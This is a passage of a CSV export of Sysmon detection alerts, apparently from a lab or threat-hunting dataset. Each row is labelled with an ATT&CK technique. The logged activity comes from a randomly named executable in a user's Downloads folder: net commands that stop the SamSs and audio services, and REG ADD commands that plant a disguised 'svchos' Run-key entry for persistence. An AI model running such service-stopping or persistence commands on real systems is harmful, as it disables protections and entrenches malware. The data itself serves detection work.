{df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1ac0-5ec9-0000-00104fff1200} +ParentProcessId: 80876 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:48.906837900Z"",""eventRecordID"":""1686"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:48.895\r\nProcessGuid: {df9fc3d3-1ac0-5ec9-0000-001085041300}\r\nProcessId: 81504\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1ac0-5ec9-0000-00104fff1200}\r\nParentProcessId: 80876\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:48.895"",""processGuid"":""{df9fc3d3-1ac0-5ec9-0000-001085041300}"",""processId"":""81504"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1ac0-5ec9-0000-00104fff1200}"",""parentProcessId"":""80876"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:44:57.006",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:48.745 +ProcessGuid: {df9fc3d3-1ac0-5ec9-0000-00104fff1200} +ProcessId: 80876 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:48.755785000Z"",""eventRecordID"":""1685"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:48.745\r\nProcessGuid: {df9fc3d3-1ac0-5ec9-0000-00104fff1200}\r\nProcessId: 80876\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:48.745"",""processGuid"":""{df9fc3d3-1ac0-5ec9-0000-00104fff1200}"",""processId"":""80876"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:44:48.980",9,"Windows Application error event","""Faulting application name: backgroundTaskHost.exe, version: 10.0.18362.1, time stamp: 0x533f8404 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xd5c +Faulting application start time: 0x01d630ffc6388e7b +Faulting application path: C:\Windows\system32\backgroundTaskHost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 9d3a6d35-86a4-4814-a612-6ad09cb2b406 +Faulting package full name: Microsoft.Windows.Cortana_1.13.0.18362_neutral_neutral_cw5n1h2txyewy +Faulting package-relative application ID: CortanaUI""",, +"May 23, 2020 @ 12:44:44.102",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-23 12:44:34.500 +ProcessGuid: {df9fc3d3-1ab2-5ec9-0000-0010bae01000} +ProcessId: 34688 +Image: C:\Windows\system32\reg.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\svchos +Details: C:\Users\John Williams\Downloads\cUIyKIO.exe""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:34.500880600Z"",""eventRecordID"":""1673"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-23 12:44:34.500\r\nProcessGuid: {df9fc3d3-1ab2-5ec9-0000-0010bae01000}\r\nProcessId: 34688\r\nImage: C:\\Windows\\system32\\reg.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svchos\r\nDetails: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-23 12:44:34.500"",""processGuid"":""{df9fc3d3-1ab2-5ec9-0000-0010bae01000}"",""processId"":""34688"",""image"":""C:\\\\Windows\\\\system32\\\\reg.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\svchos"",""details"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe""}}}" +"May 23, 2020 @ 12:44:44.076",10,"ATT&CK T1060: Direct Autorun Keys Modification","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:34.489 +ProcessGuid: {df9fc3d3-1ab2-5ec9-0000-0010bae01000} +ProcessId: 34688 +Image: C:\Windows\System32\reg.exe +FileVersion: 10.0.18362.476 (WinBuild.160101.0800) +Description: Registry Console Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: reg.exe +CommandLine: REG ADD ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""svchos"" /t REG_SZ /d ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" /f +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC +ParentProcessGuid: {df9fc3d3-1ab2-5ec9-0000-00101cde1000} +ParentProcessId: 34644 +ParentImage: C:\Windows\System32\cmd.exe +ParentCommandLine: ""C:\Windows\System32\cmd.exe"" /C REG ADD ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""svchos"" /t REG_SZ /d ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" /f""","REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" /f","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:34.491661300Z"",""eventRecordID"":""1672"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:34.489\r\nProcessGuid: {df9fc3d3-1ab2-5ec9-0000-0010bae01000}\r\nProcessId: 34688\r\nImage: C:\\Windows\\System32\\reg.exe\r\nFileVersion: 10.0.18362.476 (WinBuild.160101.0800)\r\nDescription: Registry Console Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: reg.exe\r\nCommandLine: REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" /f\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC\r\nParentProcessGuid: {df9fc3d3-1ab2-5ec9-0000-00101cde1000}\r\nParentProcessId: 34644\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\cmd.exe\"" /C REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" /f\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:34.489"",""processGuid"":""{df9fc3d3-1ab2-5ec9-0000-0010bae01000}"",""processId"":""34688"",""image"":""C:\\\\Windows\\\\System32\\\\reg.exe"",""fileVersion"":""10.0.18362.476 (WinBuild.160101.0800)"",""description"":""Registry Console Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""reg.exe"",""commandLine"":""REG ADD \\\""HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\"" /v \\\""svchos\\\"" /t REG_SZ /d \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" /f"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC"",""parentProcessGuid"":""{df9fc3d3-1ab2-5ec9-0000-00101cde1000}"",""parentProcessId"":""34644"",""parentImage"":""C:\\\\Windows\\\\System32\\\\cmd.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\cmd.exe\\\"" /C REG ADD \\\""HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\"" /v \\\""svchos\\\"" /t REG_SZ /d \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" /f""}}}" +"May 23, 2020 @ 12:44:35.984",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-23 12:44:20.956 +ProcessGuid: {df9fc3d3-1aa4-5ec9-0000-001004930e00} +ProcessId: 2392 +Image: C:\Windows\system32\reg.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\svchos +Details: C:\Users\John Williams\Downloads\sQCMgCG.exe""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:20.985304400Z"",""eventRecordID"":""1664"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-23 12:44:20.956\r\nProcessGuid: {df9fc3d3-1aa4-5ec9-0000-001004930e00}\r\nProcessId: 2392\r\nImage: C:\\Windows\\system32\\reg.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svchos\r\nDetails: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-23 12:44:20.956"",""processGuid"":""{df9fc3d3-1aa4-5ec9-0000-001004930e00}"",""processId"":""2392"",""image"":""C:\\\\Windows\\\\system32\\\\reg.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\svchos"",""details"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe""}}}" +"May 23, 2020 @ 12:44:35.661",10,"ATT&CK T1060: Direct Autorun Keys Modification","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:20.748 +ProcessGuid: {df9fc3d3-1aa4-5ec9-0000-001004930e00} +ProcessId: 2392 +Image: C:\Windows\System32\reg.exe +FileVersion: 10.0.18362.476 (WinBuild.160101.0800) +Description: Registry Console Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: reg.exe +CommandLine: REG ADD ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""svchos"" /t REG_SZ /d ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" /f +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC +ParentProcessGuid: {df9fc3d3-1aa3-5ec9-0000-0010bf720e00} +ParentProcessId: 8168 +ParentImage: C:\Windows\System32\cmd.exe +ParentCommandLine: ""C:\Windows\System32\cmd.exe"" /C REG ADD ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""svchos"" /t REG_SZ /d ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" /f""","REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" /f","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:20.756348700Z"",""eventRecordID"":""1663"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:20.748\r\nProcessGuid: {df9fc3d3-1aa4-5ec9-0000-001004930e00}\r\nProcessId: 2392\r\nImage: C:\\Windows\\System32\\reg.exe\r\nFileVersion: 10.0.18362.476 (WinBuild.160101.0800)\r\nDescription: Registry Console Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: reg.exe\r\nCommandLine: REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" /f\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC\r\nParentProcessGuid: {df9fc3d3-1aa3-5ec9-0000-0010bf720e00}\r\nParentProcessId: 8168\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\cmd.exe\"" /C REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" /f\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:20.748"",""processGuid"":""{df9fc3d3-1aa4-5ec9-0000-001004930e00}"",""processId"":""2392"",""image"":""C:\\\\Windows\\\\System32\\\\reg.exe"",""fileVersion"":""10.0.18362.476 (WinBuild.160101.0800)"",""description"":""Registry Console Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""reg.exe"",""commandLine"":""REG ADD \\\""HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\"" /v \\\""svchos\\\"" /t REG_SZ /d \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" /f"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC"",""parentProcessGuid"":""{df9fc3d3-1aa3-5ec9-0000-0010bf720e00}"",""parentProcessId"":""8168"",""parentImage"":""C:\\\\Windows\\\\System32\\\\cmd.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\cmd.exe\\\"" /C REG ADD \\\""HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\"" /v \\\""svchos\\\"" /t REG_SZ /d \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" /f""}}}" +"May 23, 2020 @ 12:44:35.653",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:20.696 +ProcessGuid: {df9fc3d3-1aa4-5ec9-0000-00105c900e00} +ProcessId: 8156 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1aa4-5ec9-0000-00103f820e00} +ParentProcessId: 5548 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:20.715081400Z"",""eventRecordID"":""1661"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:20.696\r\nProcessGuid: {df9fc3d3-1aa4-5ec9-0000-00105c900e00}\r\nProcessId: 8156\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1aa4-5ec9-0000-00103f820e00}\r\nParentProcessId: 5548\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:20.696"",""processGuid"":""{df9fc3d3-1aa4-5ec9-0000-00105c900e00}"",""processId"":""8156"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1aa4-5ec9-0000-00103f820e00}"",""parentProcessId"":""5548"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:44:35.649",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:20.408 +ProcessGuid: {df9fc3d3-1aa4-5ec9-0000-00107e880e00} +ProcessId: 4820 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: 